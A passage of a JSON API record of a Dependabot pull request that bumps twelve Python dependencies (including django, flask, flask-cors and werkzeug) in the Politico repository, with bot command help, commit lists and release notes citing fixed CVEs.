score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=py\u0026package-manager=pip\u0026previous-version=1.8.0\u0026new-version=1.11.0)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot merge` will merge this PR after your CI passes on it\n- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it\n- `@dependabot cancel merge` will cancel a previously requested merge and block automerging\n- `@dependabot reopen` will reopen this PR if it is closed\n- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/alfonsodg/Politico/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/alfonsodg/Politico/pull/1","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/alfonsodg%2FPolitico/issues/1","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/1/packages"}},{"old_version":"1.5.2","new_version":"1.11.0","update_type":"minor","path":null,"pr_created_at":"2025-09-09T22:41:01.000Z","version_change":"1.5.2 → 1.11.0","issue":{"uuid":"2813516713","node_id":"PR_kwDOC8zLps6nstup","number":1,"state":"open","title":"Bump the pip group across 1 directory with 12 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":null,"author_association":"NONE","state_reason":null,"created_at":"2025-09-09T22:41:01.000Z","updated_at":"2025-09-09T22:41:02.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"pip","update_count":12,"packages":[{"name":"certifi","old_version":"2018.1.18","new_version":"2024.7.4","repository_url":"https://github.com/certifi/python-certifi"},{"name":"django","old_version":"2.2.2","new_version":"4.2.24","repository_url":"https://github.com/django/django"},{"name":"flask","old_version":"1.0.2","new_version":"2.2.5","repository_url":"https://github.com/pallets/flask"},{"name":"flask-cors","old_version":"3.0.3","new_version":"6.0.0","repository_url":"https://github.com/corydolphin/flask-cors"},{"name":"gunicorn","old_version":"19.7.1","new_version":"23.0.0","repository_url":"https://github.com/benoitc/gunicorn"},{"name":"idna","old_version":"2.6","new_version":"3.7","repository_url":"https://github.com/kjd/idna"},{"name":"jinja2","old_version":"2.10.1","new_version":"3.1.6","repository_url":"https://github.com/pallets/jinja"},{"name":"py","old_version":"1.5.2","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"pyjwt","old_version":"1.5.3","new_version":"2.4.0","repository_url":"https://github.com/jpadilla/pyjwt"},{"name":"requests","old_version":"2.22.0","new_version":"2.32.4","repository_url":"https://github.com/psf/requests"},{"name":"urllib3","old_version":"1.25.3","new_version":"2.5.0","repository_url":"https://github.com/urllib3/urllib3"},{"name":"werkzeug","old_version":"0.14.1","new_version":"3.0.6","repository_url":"https://github.com/pallets/werkzeug"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 12 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [certifi](https://github.com/certifi/python-certifi) | `2018.1.18` | `2024.7.4` |\n| [django](https://github.com/django/django) | `2.2.2` | `4.2.24` |\n| [flask](https://github.com/pallets/flask) | `1.0.2` | `2.2.5` |\n| [flask-cors](https://github.com/corydolphin/flask-cors) | `3.0.3` | `6.0.0` |\n| [gunicorn](https://github.com/benoitc/gunicorn) | `19.7.1` | `23.0.0` |\n| [idna](https://github.com/kjd/idna) | `2.6` | `3.7` |\n| [jinja2](https://github.com/pallets/jinja) | `2.10.1` | `3.1.6` |\n| [py](https://github.com/pytest-dev/py) | `1.5.2` | `1.11.0` |\n| [pyjwt](https://github.com/jpadilla/pyjwt) | `1.5.3` | `2.4.0` |\n| [requests](https://github.com/psf/requests) | `2.22.0` | `2.32.4` |\n| [urllib3](https://github.com/urllib3/urllib3) | `1.25.3` | `2.5.0` |\n| [werkzeug](https://github.com/pallets/werkzeug) | `0.14.1` | `3.0.6` |\n\n\nUpdates `certifi` from 2018.1.18 to 2024.7.4\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/bd8153872e9c6fc98f4023df9c2deaffea2fa463\"\u003e\u003ccode\u003ebd81538\u003c/code\u003e\u003c/a\u003e 2024.07.04 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/295\"\u003e#295\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/06a2cbf21f345563dde6c28b60e29d57e9b210b3\"\u003e\u003ccode\u003e06a2cbf\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.5 to 6.1.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/294\"\u003e#294\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/13bba02b72bac97c432c277158bc04b4d2a6bc23\"\u003e\u003ccode\u003e13bba02\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/293\"\u003e#293\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/e8abcd0e62b334c164b95d49fcabdc9ecbca0554\"\u003e\u003ccode\u003ee8abcd0\u003c/code\u003e\u003c/a\u003e Bump pypa/gh-action-pypi-publish from 1.8.14 to 1.9.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/292\"\u003e#292\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/124f4adf171e15cd9a91a8b6e0325ecc97be8fe1\"\u003e\u003ccode\u003e124f4ad\u003c/code\u003e\u003c/a\u003e 2024.06.02 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/291\"\u003e#291\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/c2196ce5d6ee675b27755a19948480a7823e2c6a\"\u003e\u003ccode\u003ec2196ce\u003c/code\u003e\u003c/a\u003e --- (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/290\"\u003e#290\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/fefdeec7588ff1c05214b85a552afcad5fdb51b2\"\u003e\u003ccode\u003efefdeec\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.4 to 4.1.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/289\"\u003e#289\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/3c5fb1560b826a7f83f1f9750173ff766492c9cf\"\u003e\u003ccode\u003e3c5fb15\u003c/code\u003e\u003c/a\u003e Bump actions/download-artifact from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/286\"\u003e#286\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/4a9569a3eb58db8548536fc16c5c5c7af946a5b1\"\u003e\u003ccode\u003e4a9569a\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.2 to 4.1.4 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/287\"\u003e#287\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/1fc808626a895a916b1e4c2b63abae6c5eafdbe3\"\u003e\u003ccode\u003e1fc8086\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.4 to 6.0.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/288\"\u003e#288\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/certifi/python-certifi/compare/2018.01.18...2024.07.04\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `django` from 2.2.2 to 4.2.24\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/5e23d8900201ba10bf76adf825179c72cbf2e1e2\"\u003e\u003ccode\u003e5e23d89\u003c/code\u003e\u003c/a\u003e [4.2.x] Bumped version for 4.2.24 release.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/31334e6965ad136a5e369993b01721499c5d1a92\"\u003e\u003ccode\u003e31334e6\u003c/code\u003e\u003c/a\u003e [4.2.x] Fixed CVE-2025-57833 -- Protected FilteredRelation against SQL inject...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/d5860d55ebe3623e6c6f8d6c5a1cdb28ae4a7505\"\u003e\u003ccode\u003ed5860d5\u003c/code\u003e\u003c/a\u003e [4.2.x] Added stub release notes and release date for 4.2.24.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/c3f98718976820da5123169027612324d09a89d6\"\u003e\u003ccode\u003ec3f9871\u003c/code\u003e\u003c/a\u003e [4.2.x] Fixed \u003ca href=\"https://redirect.github.com/django/django/issues/36499\"\u003e#36499\u003c/a\u003e -- Adjusted utils_tests.test_html.TestUtilsHtml.test_str...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/2a79837e19d2569c3e5162f3e0181a4e29bb7dba\"\u003e\u003ccode\u003e2a79837\u003c/code\u003e\u003c/a\u003e [4.2.x] Fixed test_utils.tests.HTMLEqualTests.test_parsing_errors following P...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/7335a1a9138e905aa681169c3b820fed207edfa5\"\u003e\u003ccode\u003e7335a1a\u003c/code\u003e\u003c/a\u003e [4.2.x] Refs \u003ca href=\"https://redirect.github.com/django/django/issues/36535\"\u003e#36535\u003c/a\u003e -- Doc'd that docutils \u0026lt; 0.22 is required.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/591b23a11b099081fc39d00171f5dc9efbd67e13\"\u003e\u003ccode\u003e591b23a\u003c/code\u003e\u003c/a\u003e [4.2.x] Fixed GitHub Action that checks commit prefixes to fetch PR head corr...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/0c9ab357b7559a1676ace17e469848739b525d79\"\u003e\u003ccode\u003e0c9ab35\u003c/code\u003e\u003c/a\u003e [4.2.x] Added GitHub Action to enforce stable branch commit message prefix.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/8293b0f52d086410bb480b7d6a79e614c8184761\"\u003e\u003ccode\u003e8293b0f\u003c/code\u003e\u003c/a\u003e [4.2.x] Added follow-up to CVE-2025-48432 to security archive.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/bc4d96cfc3ab8e26a2cd6b963b5f74ff0bffe9e2\"\u003e\u003ccode\u003ebc4d96c\u003c/code\u003e\u003c/a\u003e [4.2.x] Post-release version bump.\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/django/django/compare/2.2.2...4.2.24\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `flask` from 1.0.2 to 2.2.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/flask/releases\"\u003eflask's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.2.5\u003c/h2\u003e\n\u003cp\u003eThis is a security fix release for the 2.2.x release branch. Note that 2.3.x is the currently supported release branch; please upgrade to the latest version if possible.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity advisory: \u003ca href=\"https://github.com/pallets/flask/security/advisories/GHSA-m2qf-hxjv-5gpq\"\u003ehttps://github.com/pallets/flask/security/advisories/GHSA-m2qf-hxjv-5gpq\u003c/a\u003e, CVE-2023-30861\u003c/li\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-5\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-5\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/30?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/30?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.4\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the 2.2.x release branch.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-4\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-4\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/27?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/27?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.3\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the 2.2.x release branch.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-3\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-3\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/26?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/26?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.2\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the \u003ca href=\"https://github.com/pallets/flask/releases/tag/2.2.0\"\u003e2.2.0\u003c/a\u003e feature release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-2\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-2\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/25?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/25?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.1\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the \u003ca href=\"https://github.com/pallets/flask/releases/tag/2.2.0\"\u003e2.2.0\u003c/a\u003e feature release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-1\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-1\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/23?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/23?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.0\u003c/h2\u003e\n\u003cp\u003eThis is a feature release, which includes new features and removes previously deprecated code. The 2.2.x branch is now the supported bug fix branch, the 2.1.x branch will become a tag marking the end of support for that branch. We encourage everyone to upgrade, and to use a tool such as \u003ca href=\"https://pypi.org/project/pip-tools/\"\u003epip-tools\u003c/a\u003e to pin all dependencies and control upgrades.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-0\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-0\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/19?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/19?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.1.3\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.1.x/changes/#version-2-1-3\"\u003ehttps://flask.palletsprojects.com/en/2.1.x/changes/#version-2-1-3\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/22?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/22?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.1.2\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the \u003ca href=\"https://github.com/pallets/flask/releases/tag/2.1.0\"\u003e2.1.0\u003c/a\u003e feature release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.1.x/changes/#version-2-1-2\"\u003ehttps://flask.palletsprojects.com/en/2.1.x/changes/#version-2-1-2\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/21?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/21?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.1.1\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the \u003ca href=\"https://github.com/pallets/flask/releases/tag/2.1.0\"\u003e2.1.0\u003c/a\u003e feature release.\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/flask/blob/main/CHANGES.rst\"\u003eflask's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 2.2.5\u003c/h2\u003e\n\u003cp\u003eReleased 2023-05-02\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate for compatibility with Werkzeug 2.3.3.\u003c/li\u003e\n\u003cli\u003eSet \u003ccode\u003eVary: Cookie\u003c/code\u003e header when the session is accessed, modified, or refreshed.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.4\u003c/h2\u003e\n\u003cp\u003eReleased 2023-04-25\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate for compatibility with Werkzeug 2.3.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.3\u003c/h2\u003e\n\u003cp\u003eReleased 2023-02-15\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAutoescape is enabled by default for \u003ccode\u003e.svg\u003c/code\u003e template files. :issue:\u003ccode\u003e4831\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix the type of \u003ccode\u003etemplate_folder\u003c/code\u003e to accept \u003ccode\u003epathlib.Path\u003c/code\u003e. :issue:\u003ccode\u003e4892\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003e--debug\u003c/code\u003e option to the \u003ccode\u003eflask run\u003c/code\u003e command. :issue:\u003ccode\u003e4777\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.2\u003c/h2\u003e\n\u003cp\u003eReleased 2022-08-08\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate Werkzeug dependency to \u0026gt;= 2.2.2. This includes fixes related\nto the new faster router, header parsing, and the development\nserver. :pr:\u003ccode\u003e4754\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix the default value for \u003ccode\u003eapp.env\u003c/code\u003e to be \u003ccode\u003e\u0026quot;production\u0026quot;\u003c/code\u003e. This\nattribute remains deprecated. :issue:\u003ccode\u003e4740\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.1\u003c/h2\u003e\n\u003cp\u003eReleased 2022-08-03\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSetting or accessing \u003ccode\u003ejson_encoder\u003c/code\u003e or \u003ccode\u003ejson_decoder\u003c/code\u003e raises a\ndeprecation warning. :issue:\u003ccode\u003e4732\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/47af817c8fe01045c641b97f8fb784c7ad864eee\"\u003e\u003ccode\u003e47af817\u003c/code\u003e\u003c/a\u003e release version 2.2.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/afd63b16170b7c047f5758eb910c416511e9c965\"\u003e\u003ccode\u003eafd63b1\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pallets/flask/issues/5109\"\u003e#5109\u003c/a\u003e from pallets/backport-vary-cookie\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/8646edca6f47e2cd57464081b3911218d4734f8d\"\u003e\u003ccode\u003e8646edc\u003c/code\u003e\u003c/a\u003e set \u003ccode\u003eVary: Cookie\u003c/code\u003e header consistently for session\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/a6367dac747c1e149c60767eee7e8aa9c281c58e\"\u003e\u003ccode\u003ea6367da\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pallets/flask/issues/5108\"\u003e#5108\u003c/a\u003e from pallets/werkzeug-compat\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/3fbfbad79fe294918459b70eb409d555b20de2c8\"\u003e\u003ccode\u003e3fbfbad\u003c/code\u003e\u003c/a\u003e werkzeug 2.3.3 compatibility\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/726d3f4fa9e8a2960541debc2d2713571da54441\"\u003e\u003ccode\u003e726d3f4\u003c/code\u003e\u003c/a\u003e start version 2.2.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/ddc7accaa2e83b328f969c120af2ce0804876b4a\"\u003e\u003ccode\u003eddc7acc\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pallets/flask/issues/5081\"\u003e#5081\u003c/a\u003e from pallets/release-2.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/74e03298200e33951ca350a35aa3a8c0b4ff8177\"\u003e\u003ccode\u003e74e0329\u003c/code\u003e\u003c/a\u003e release version 2.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/2d460685b1b3d66c713739ee91183c22fb2e5dc8\"\u003e\u003ccode\u003e2d46068\u003c/code\u003e\u003c/a\u003e update dev env\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/64bc45874daf4b9828830ea0037a19beb8364ee3\"\u003e\u003ccode\u003e64bc458\u003c/code\u003e\u003c/a\u003e update dev dependencies\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets/flask/compare/1.0.2...2.2.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `flask-cors` from 3.0.3 to 6.0.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/corydolphin/flask-cors/releases\"\u003eflask-cors's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e6.0.0\u003c/h2\u003e\n\u003ch2\u003eBreaking\u003c/h2\u003e\n\u003cp\u003ePath specificity ordering has changed to improve specificity. This may break users who expected the previous incorrect ordering.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e[CVE-2024-6839] Sort Paths by Regex Specificity by \u003ca href=\"https://github.com/adrianosela\"\u003e\u003ccode\u003e@​adrianosela\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/391\"\u003ecorydolphin/flask-cors#391\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[CVE-2024-6844] Replace use of (urllib) unquote_plus with unquote by \u003ca href=\"https://github.com/adrianosela\"\u003e\u003ccode\u003e@​adrianosela\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/389\"\u003ecorydolphin/flask-cors#389\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[CVE-2024-6866] Case Sensitive Request Path Matching by \u003ca href=\"https://github.com/adrianosela\"\u003e\u003ccode\u003e@​adrianosela\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/390\"\u003ecorydolphin/flask-cors#390\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/corydolphin/flask-cors/compare/5.0.1...6.0.0\"\u003ehttps://github.com/corydolphin/flask-cors/compare/5.0.1...6.0.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e5.0.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cp\u003eThis primarily changes packaging to use uv and a new release pipeline, along with some small documentation improvements\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e[Docs] Fix links to documentation by \u003ca href=\"https://github.com/coren-frankel\"\u003e\u003ccode\u003e@​coren-frankel\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/369\"\u003ecorydolphin/flask-cors#369\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix minor typos by \u003ca href=\"https://github.com/kkirsche\"\u003e\u003ccode\u003e@​kkirsche\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/371\"\u003ecorydolphin/flask-cors#371\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMigrate packaging and environment management to use uv by \u003ca href=\"https://github.com/corydolphin\"\u003e\u003ccode\u003e@​corydolphin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/377\"\u003ecorydolphin/flask-cors#377\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix release pipeline by \u003ca href=\"https://github.com/corydolphin\"\u003e\u003ccode\u003e@​corydolphin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/378\"\u003ecorydolphin/flask-cors#378\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAlways use trusted publishing by \u003ca href=\"https://github.com/corydolphin\"\u003e\u003ccode\u003e@​corydolphin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/379\"\u003ecorydolphin/flask-cors#379\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eWorkaround license publishing issue by \u003ca href=\"https://github.com/corydolphin\"\u003e\u003ccode\u003e@​corydolphin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/corydolphin/flask-cors/pull/380\"\u003ecorydolphin/flask-cors#380\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix packaging: missing source files by \u003ca 